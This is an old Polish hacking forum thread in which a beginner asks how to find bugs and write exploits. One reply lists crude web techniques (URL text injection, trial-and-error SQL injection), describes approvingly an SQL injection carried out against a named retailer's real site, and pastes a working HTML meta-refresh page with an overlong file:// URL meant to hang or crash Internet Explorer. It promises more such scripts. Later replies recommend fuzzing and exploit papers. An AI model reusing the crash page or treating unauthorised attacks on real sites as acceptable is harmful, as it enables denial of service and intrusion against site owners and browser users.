bugi

**maxhack** · 10-17-2007

jak wykrywać bugi i jak pisac exploity do nich (troche głupie pytanie)

**Amidamaru** · 10-17-2007

Drogi MaxHack...

Jak chcesz to robić to obserwuj inne błędy...

Przydałaby się wiedza na temat: HTML, PHP, MySQL

1. Np. na Allegro brak cudzysłowów w adresach daje możliwości, które potem możemy dalej badać...

2. Na niektórych CMS-ach czy stronach dane wprowadzone w adres - np. http://www.jakistamadres.com/blad.ph...KEDHACKEHACKED wywoła wyświetlenie dowolnego tekstu

3. SQLInjection - dla początkujących - metoda prób i błędów - np. mam zapisane jak na stronie Biedronki wykonałem atak SQLInjection i wyskoczyło kilka przydatnych informacji

4. Błędy w IE

Jak tkoś używa IE to jego sprawa... Ale to kwestia 5 minut i 10 linijek kody, aby wykryć dzirę typu "Stack Overflow", zawiechy IE czy wyłączenie komuś kompa... Ciekawy jest efekt - odwiedzasz strone a nagle wyłącza Ci się komp

Może potem Ci zapodam kilka skryptów (czysty HTML) na IE

Tutaj masz prosty skopiowany z hackme bo to na początek wystarczy:

Kod html:

<META HTTP-EQUIV="Refresh"       CONTENT="0;URL=file://test/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAA5ZĚ&#172;AAAAAAAAAAAAAAAAAAAAAAACCCCCSSSŞ-      #§&#172;HP+AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA      /">

      <HTML>Thx for using Internet Explorer 5.0</HTML>

zapisz to sobie jako zawiecha.html i odpal pod IE... Efekt taki sobie...
Potem dam coś lepszego... To nie jest jeszcze exploit, ale kombinując z tym możesz dokonać w przyszłości wiele

Jeszcze dam Ci linka do mojej ulubionej chodź niezwykle prostej: http://1tbzs6sjz.yoyo.pl/crash-ie.html

Pozdrawiam

**Eragon Argetlam** · 10-17-2007

Było juz a forum ale przychylam sie do wypowiedzi Amidamaru

A ponadto przydałby się C, VBS itp.
A co do błędów sql to na cyber crime jest opisany błąd sqlinjection - po wpisaniu na Wrocła.Plw wyszukiwarce

Kod:

Wskoczy ci parę linijek tekstu

**Anubis** · 12-05-2007

Napisał maxhack

jak wykrywać bugi i jak pisac exploity do nich (troche głupie pytanie)

jak wykrywac ... zdecydowanie fuzzing (chyba ze masz źródła).

// Jak pisać http://milw0rm.com/papers/ u str0ke-a zawsze i na temat

**dragon1020** · 12-06-2007

http://helion.pl/ksiazki/shell.htm
Tutaj masz wszystko dokładnie opisane.

Temat: bugi

Narzędzia wątku

Display

bugi

Zasady Postowania

Subskrybuj